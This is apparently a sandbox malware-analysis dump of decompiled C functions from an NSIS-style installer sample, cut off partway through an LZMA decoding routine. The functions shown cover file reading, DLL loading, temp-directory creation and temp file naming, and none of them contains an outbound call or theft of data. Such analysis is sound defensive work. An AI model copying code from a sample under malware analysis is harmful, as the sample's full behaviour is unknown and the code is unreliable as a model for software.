                          control_flow_graph 518 4032b4-4032cb 519 4032d4-4032dc 518->519 520 4032cd 518->520 521 4032e3-4032e8 519->521 522 4032de 519->522 520->519 523 4032f8-403305 call 403499 521->523 524 4032ea-4032f3 call 4034af 521->524 522->521 528 403450 523->528 529 40330b-40330f 523->529 524->523 530 403452-403453 528->530 531 403315-403335 GetTickCount call 406a2f 529->531 532 403439-40343b 529->532 533 403492-403496 530->533 544 40348f 531->544 546 40333b-403343 531->546 534 403484-403488 532->534 535 40343d-403440 532->535 537 403455-40345b 534->537 538 40348a 534->538 539 403442 535->539 540 403445-40344e call 403499 535->540 542 403460-40346e call 403499 537->542 543 40345d 537->543 538->544 539->540 540->528 551 40348c 540->551 542->528 555 403470-40347c call 4060a9 542->555 543->542 544->533 549 403345 546->549 550 403348-403356 call 403499 546->550 549->550 550->528 556 40335c-403365 550->556 551->544 561 403435-403437 555->561 562 40347e-403481 555->562 558 40336b-403388 call 406a4f 556->558 564 403431-403433 558->564 565 40338e-4033a5 GetTickCount 558->565 561->530 562->534 564->530 566 4033f0-4033f2 565->566 567 4033a7-4033af 565->567 570 4033f4-4033f8 566->570 571 403425-403429 566->571 568 4033b1-4033b5 567->568 569 4033b7-4033ed MulDiv wsprintfW call 405569 567->569 568->566 568->569 569->566 574 4033fa-4033ff call 4060a9 570->574 575 40340d-403413 570->575 571->546 572 40342f 571->572 572->544 579 403404-403406 574->579 577 403419-40341d 575->577 577->558 580 403423 577->580 579->561 581 403408-40340b 579->581 580->544 581->577
                          C-Code - Quality: 94%
                          			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                          				signed int _v8;
                          				int _v12;
                          				long _v16;
                          				intOrPtr _v20;
                          				short _v148;
                          				void* _t59;
                          				intOrPtr _t69;
                          				long _t70;
                          				void* _t71;
                          				intOrPtr _t81;
                          				intOrPtr _t86;
                          				long _t89;
                          				signed int _t90;
                          				int _t91;
                          				int _t92;
                          				intOrPtr _t93;
                          				void* _t94;
                          				void* _t95;
                          
                          				_t90 = _a16;
                          				_t86 = _a12;
                          				_v12 = _t90;
                          				if(_t86 == 0) {
                          					_v12 = 0x8000;
                          				}
                          				_v8 = _v8 & 0x00000000;
                          				_t81 = _t86;
                          				if(_t86 == 0) {
                          					_t81 = 0x418ec0;
                          				}
                          				_t56 = _a4;
                          				if(_a4 >= 0) {
                          					E004034AF( *0x42a278 + _t56);
                          				}
                          				if(E00403499( &_a16, 4) == 0) {
                          					L33:
                          					_push(0xfffffffd);
                          					goto L34;
                          				} else {
                          					if((_a19 & 0x00000080) == 0) {
                          						if(_t86 == 0) {
                          							while(_a16 > 0) {
                          								_t91 = _v12;
                          								if(_a16 < _t91) {
                          									_t91 = _a16;
                          								}
                          								if(E00403499(0x414ec0, _t91) == 0) {
                          									goto L33;
                          								} else {
                          									if(E004060A9(_a8, 0x414ec0, _t91) == 0) {
                          										L28:
                          										_push(0xfffffffe);
                          										L34:
                          										_pop(_t59);
                          										return _t59;
                          									}
                          									_v8 = _v8 + _t91;
                          									_a16 = _a16 - _t91;
                          									continue;
                          								}
                          							}
                          							L43:
                          							return _v8;
                          						}
                          						if(_a16 < _t90) {
                          							_t90 = _a16;
                          						}
                          						if(E00403499(_t86, _t90) != 0) {
                          							_v8 = _t90;
                          							goto L43;
                          						} else {
                          							goto L33;
                          						}
                          					}
                          					_v16 = GetTickCount();
                          					E00406A2F(0x40ce30);
                          					_t13 =  &_a16;
                          					 *_t13 = _a16 & 0x7fffffff;
                          					_a4 = _a16;
                          					if( *_t13 <= 0) {
                          						goto L43;
                          					} else {
                          						goto L9;
                          					}
                          					while(1) {
                          						L9:
                          						_t92 = 0x4000;
                          						if(_a16 < 0x4000) {
                          							_t92 = _a16;
                          						}
                          						if(E00403499(0x414ec0, _t92) == 0) {
                          							goto L33;
                          						}
                          						_a16 = _a16 - _t92;
                          						 *0x40ce48 = 0x414ec0;
                          						 *0x40ce4c = _t92;
                          						while(1) {
                          							 *0x40ce50 = _t81;
                          							 *0x40ce54 = _v12; // executed
                          							_t69 = E00406A4F(0x40ce30); // executed
                          							_v20 = _t69;
                          							if(_t69 < 0) {
                          								break;
                          							}
                          							_t93 =  *0x40ce50; // 0x418ec0
                          							_t94 = _t93 - _t81;
                          							_t70 = GetTickCount();
                          							_t89 = _t70;
                          							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
                          								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                          								_t95 = _t95 + 0xc;
                          								E00405569(0,  &_v148);
                          								_v16 = _t89;
                          							}
                          							if(_t94 == 0) {
                          								if(_a16 > 0) {
                          									goto L9;
                          								}
                          								goto L43;
                          							} else {
                          								if(_a12 != 0) {
                          									_v8 = _v8 + _t94;
                          									_v12 = _v12 - _t94;
                          									_t81 =  *0x40ce50; // 0x418ec0
                          									L23:
                          									if(_v20 != 1) {
                          										continue;
                          									}
                          									goto L43;
                          								}
                          								_t71 = E004060A9(_a8, _t81, _t94); // executed
                          								if(_t71 == 0) {
                          									goto L28;
                          								}
                          								_v8 = _v8 + _t94;
                          								goto L23;
                          							}
                          						}
                          						_push(0xfffffffc);
                          						goto L34;
                          					}
                          					goto L33;
                          				}
                          			}





















                          0x004032bf
                          0x004032c3
                          0x004032c6
                          0x004032cb
                          0x004032cd
                          0x004032cd
                          0x004032d4
                          0x004032d8
                          0x004032dc
                          0x004032de
                          0x004032de
                          0x004032e3
                          0x004032e8
                          0x004032f3
                          0x004032f3
                          0x00403305
                          0x00403450
                          0x00403450
                          0x00000000
                          0x0040330b
                          0x0040330f
                          0x0040343b
                          0x00403484
                          0x00403455
                          0x0040345b
                          0x0040345d
                          0x0040345d
                          0x0040346e
                          0x00000000
                          0x00403470
                          0x0040347c
                          0x00403435
                          0x00403435
                          0x00403452
                          0x00403452
                          0x00000000
                          0x00403452
                          0x0040347e
                          0x00403481
                          0x00000000
                          0x00403481
                          0x0040346e
                          0x0040348f
                          0x00000000
                          0x0040348f
                          0x00403440
                          0x00403442
                          0x00403442
                          0x0040344e
                          0x0040348c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040344e
                          0x00403320
                          0x00403323
                          0x00403328
                          0x00403328
                          0x00403332
                          0x00403335
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040333b
                          0x0040333b
                          0x0040333b
                          0x00403343
                          0x00403345
                          0x00403345
                          0x00403356
                          0x00000000
                          0x00000000
                          0x0040335c
                          0x0040335f
                          0x00403365
                          0x0040336b
                          0x00403373
                          0x00403379
                          0x0040337e
                          0x00403385
                          0x00403388
                          0x00000000
                          0x00000000
                          0x0040338e
                          0x00403394
                          0x00403396
                          0x004033a3
                          0x004033a5
                          0x004033d6
                          0x004033dc
                          0x004033e8
                          0x004033ed
                          0x004033ed
                          0x004033f2
                          0x00403429
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004033f4
                          0x004033f8
                          0x0040340d
                          0x00403410
                          0x00403413
                          0x00403419
                          0x0040341d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403423
                          0x004033ff
                          0x00403406
                          0x00000000
                          0x00000000
                          0x00403408
                          0x00000000
                          0x00403408
                          0x004033f2
                          0x00403431
                          0x00000000
                          0x00403431
                          0x00000000
                          0x0040333b

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CountTick$wsprintf
                          • String ID: ... %d%%$G8@
                          • API String ID: 551687249-649311722
                          • Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                          • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                          • Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                          • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 582 406864-406884 GetSystemDirectoryW 583 406886 582->583 584 406888-40688a 582->584 583->584 585 40689b-40689d 584->585 586 40688c-406895 584->586 588 40689e-4068d1 wsprintfW LoadLibraryExW 585->588 586->585 587 406897-406899 586->587 587->588
                          C-Code - Quality: 100%
                          			E00406864(intOrPtr _a4) {
                          				short _v576;
                          				signed int _t13;
                          				struct HINSTANCE__* _t17;
                          				signed int _t19;
                          				void* _t24;
                          
                          				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                          				if(_t13 > 0x104) {
                          					_t13 = 0;
                          				}
                          				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                          					_t19 = 1;
                          				} else {
                          					_t19 = 0;
                          				}
                          				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                          				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                          				return _t17;
                          			}








                          0x0040687b
                          0x00406884
                          0x00406886
                          0x00406886
                          0x0040688a
                          0x0040689d
                          0x00406897
                          0x00406897
                          0x00406897
                          0x004068b6
                          0x004068ca
                          0x004068d1

                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                          • wsprintfW.USER32 ref: 004068B6
                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: DirectoryLibraryLoadSystemwsprintf
                          • String ID: %s%S.dll$UXTHEME$\
                          • API String ID: 2200240437-1946221925
                          • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                          • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                          • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                          • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 589 405a38-405a83 CreateDirectoryW 590 405a85-405a87 589->590 591 405a89-405a96 GetLastError 589->591 592 405ab0-405ab2 590->592 591->592 593 405a98-405aac SetFileSecurityW 591->593 593->590 594 405aae GetLastError 593->594 594->592
                          C-Code - Quality: 100%
                          			E00405A38(WCHAR* _a4) {
                          				struct _SECURITY_ATTRIBUTES _v16;
                          				struct _SECURITY_DESCRIPTOR _v36;
                          				int _t22;
                          				long _t23;
                          
                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                          				_v36.Owner = 0x4083f8;
                          				_v36.Group = 0x4083f8;
                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                          				_v16.lpSecurityDescriptor =  &_v36;
                          				_v36.Revision = 1;
                          				_v36.Control = 4;
                          				_v36.Dacl = 0x4083e8;
                          				_v16.nLength = 0xc;
                          				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                          				if(_t22 != 0) {
                          					L1:
                          					return 0;
                          				}
                          				_t23 = GetLastError();
                          				if(_t23 == 0xb7) {
                          					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                          						goto L1;
                          					}
                          					return GetLastError();
                          				}
                          				return _t23;
                          			}







                          0x00405a43
                          0x00405a47
                          0x00405a4a
                          0x00405a50
                          0x00405a54
                          0x00405a58
                          0x00405a60
                          0x00405a67
                          0x00405a6d
                          0x00405a74
                          0x00405a7b
                          0x00405a83
                          0x00405a85
                          0x00000000
                          0x00405a85
                          0x00405a8f
                          0x00405a96
                          0x00405aac
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405aae
                          0x00405ab2

                          APIs
                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                          • GetLastError.KERNEL32 ref: 00405A8F
                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                          • GetLastError.KERNEL32 ref: 00405AAE
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 3449924974-3081826266
                          • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                          • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                          • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                          • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 595 406026-406032 596 406033-406067 GetTickCount GetTempFileNameW 595->596 597 406076-406078 596->597 598 406069-40606b 596->598 599 406070-406073 597->599 598->596 600 40606d 598->600 600->599
                          C-Code - Quality: 100%
                          			E00406026(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                          				intOrPtr _v8;
                          				short _v12;
                          				short _t12;
                          				intOrPtr _t13;
                          				signed int _t14;
                          				WCHAR* _t17;
                          				signed int _t19;
                          				signed short _t23;
                          				WCHAR* _t26;
                          
                          				_t26 = _a4;
                          				_t23 = 0x64;
                          				while(1) {
                          					_t12 =  *L"nsa"; // 0x73006e
                          					_t23 = _t23 - 1;
                          					_v12 = _t12;
                          					_t13 =  *0x40a57c; // 0x61
                          					_v8 = _t13;
                          					_t14 = GetTickCount();
                          					_t19 = 0x1a;
                          					_v8 = _v8 + _t14 % _t19;
                          					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                          					if(_t17 != 0) {
                          						break;
                          					}
                          					if(_t23 != 0) {
                          						continue;
                          					} else {
                          						 *_t26 =  *_t26 & _t23;
                          					}
                          					L4:
                          					return _t17;
                          				}
                          				_t17 = _t26;
                          				goto L4;
                          			}












                          0x0040602c
                          0x00406032
                          0x00406033
                          0x00406033
                          0x00406038
                          0x00406039
                          0x0040603c
                          0x00406041
                          0x00406044
                          0x0040604e
                          0x0040605b
                          0x0040605f
                          0x00406067
                          0x00000000
                          0x00000000
                          0x0040606b
                          0x00000000
                          0x0040606d
                          0x0040606d
                          0x0040606d
                          0x00406070
                          0x00406073
                          0x00406073
                          0x00406076
                          0x00000000

                          APIs
                          • GetTickCount.KERNEL32 ref: 00406044
                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-678247507
                          • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                          • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                          • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                          • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 684 405ede-405ef9 call 406507 call 405e81 689 405efb-405efd 684->689 690 405eff-405f0c call 40678e 684->690 691 405f57-405f59 689->691 694 405f1c-405f20 690->694 695 405f0e-405f14 690->695 697 405f36-405f3f lstrlenW 694->697 695->689 696 405f16-405f1a 695->696 696->689 696->694 698 405f41-405f55 call 405dd6 GetFileAttributesW 697->698 699 405f22-405f29 call 40683d 697->699 698->691 704 405f30-405f31 call 405e22 699->704 705 405f2b-405f2e 699->705 704->697 705->689 705->704
                          C-Code - Quality: 53%
                          			E00405EDE(void* __eflags, intOrPtr _a4) {
                          				int _t11;
                          				signed char* _t12;
                          				long _t16;
                          				intOrPtr _t18;
                          				intOrPtr* _t21;
                          				signed int _t23;
                          
                          				E00406507(0x425f10, _a4);
                          				_t21 = E00405E81(0x425f10);
                          				if(_t21 != 0) {
                          					E0040678E(_t21);
                          					if(( *0x42a238 & 0x00000080) == 0) {
                          						L5:
                          						_t23 = _t21 - 0x425f10 >> 1;
                          						while(1) {
                          							_t11 = lstrlenW(0x425f10);
                          							_push(0x425f10);
                          							if(_t11 <= _t23) {
                          								break;
                          							}
                          							_t12 = E0040683D();
                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                          								E00405E22(0x425f10);
                          								continue;
                          							} else {
                          								goto L1;
                          							}
                          						}
                          						E00405DD6();
                          						_t16 = GetFileAttributesW(??); // executed
                          						return 0 | _t16 != 0xffffffff;
                          					}
                          					_t18 =  *_t21;
                          					if(_t18 == 0 || _t18 == 0x5c) {
                          						goto L1;
                          					} else {
                          						goto L5;
                          					}
                          				}
                          				L1:
                          				return 0;
                          			}









                          0x00405eea
                          0x00405ef5
                          0x00405ef9
                          0x00405f00
                          0x00405f0c
                          0x00405f1c
                          0x00405f1e
                          0x00405f36
                          0x00405f37
                          0x00405f3e
                          0x00405f3f
                          0x00000000
                          0x00000000
                          0x00405f22
                          0x00405f29
                          0x00405f31
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f29
                          0x00405f41
                          0x00405f47
                          0x00000000
                          0x00405f55
                          0x00405f0e
                          0x00405f14
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f14
                          0x00405efb
                          0x00000000

                          APIs
                            • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                            • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                            • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                            • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                          • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                          • GetFileAttributesW.KERNELBASE(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 3248276644-3081826266
                          • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                          • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                          • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                          • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 711 407033-407039 712 40703b-40703d 711->712 713 40703e-40705c 711->713 712->713 714 40726a-40727f 713->714 715 40732f-40733c 713->715 717 407281-407297 714->717 718 407299-4072af 714->718 716 407366-40736a 715->716 720 4073ca-4073dd 716->720 721 40736c-40738d 716->721 719 4072b2-4072b9 717->719 718->719 722 4072e0 719->722 723 4072bb-4072bf 719->723 726 4072e6-4072ec 720->726 724 4073a6-4073b9 721->724 725 40738f-4073a4 721->725 722->726 727 4072c5-4072dd 723->727 728 40746e-407478 723->728 729 4073bc-4073c3 724->729 725->729 734 406a91 726->734 735 407499 726->735 727->722 731 407484-407497 728->731 732 407363 729->732 733 4073c5 729->733 737 40749c-4074a0 731->737 732->716 746 407348-407360 733->746 747 40747a 733->747 738 406a98-406a9c 734->738 739 406bd8-406bf9 734->739 740 406b3d-406b41 734->740 741 406bad-406bb1 734->741 735->737 738->731 748 406aa2-406aaf 738->748 739->714 744 406b47-406b60 740->744 745 4073ed-4073f7 740->745 742 406bb7-406bcb 741->742 743 4073fc-407406 741->743 750 406bce-406bd6 742->750 743->731 751 406b63-406b67 744->751 745->731 746->732 747->731 748->735 749 406ab5-406afb 748->749 752 406b23-406b25 749->752 753 406afd-406b01 749->753 750->739 750->741 751->740 754 406b69-406b6f 751->754 757 406b33-406b3b 752->757 758 406b27-406b31 752->758 755 406b03-406b06 GlobalFree 753->755 756 406b0c-406b1a GlobalAlloc 753->756 759 406b71-406b78 754->759 760 406b99-406bab 754->760 755->756 756->735 761 406b20 756->761 757->751 758->757 758->758 762 406b83-406b93 GlobalAlloc 759->762 763 406b7a-406b7d GlobalFree 759->763 760->750 761->752 762->735 762->760 763->762
                          C-Code - Quality: 99%
                          			E00407033() {
                          				signed int _t530;
                          				void _t537;
                          				signed int _t538;
                          				signed int _t539;
                          				unsigned short _t569;
                          				signed int _t579;
                          				signed int _t607;
                          				void* _t627;
                          				signed int _t628;
                          				signed int _t635;
                          				signed int* _t643;
                          				void* _t644;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					_t530 =  *(_t644 - 0x30);
                          					if(_t530 >= 4) {
                          					}
                          					 *(_t644 - 0x40) = 6;
                          					 *(_t644 - 0x7c) = 0x19;
                          					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                          					while(1) {
                          						L145:
                          						 *(_t644 - 0x50) = 1;
                          						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          						while(1) {
                          							L149:
                          							if( *(_t644 - 0x48) <= 0) {
                          								goto L155;
                          							}
                          							L150:
                          							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                          							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                          							 *(_t644 - 0x54) = _t643;
                          							_t569 =  *_t643;
                          							_t635 = _t569 & 0x0000ffff;
                          							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                          							if( *(_t644 - 0xc) >= _t607) {
                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                          								_t628 = _t627 + 1;
                          								 *_t643 = _t569 - (_t569 >> 5);
                          								 *(_t644 - 0x50) = _t628;
                          							} else {
                          								 *(_t644 - 0x10) = _t607;
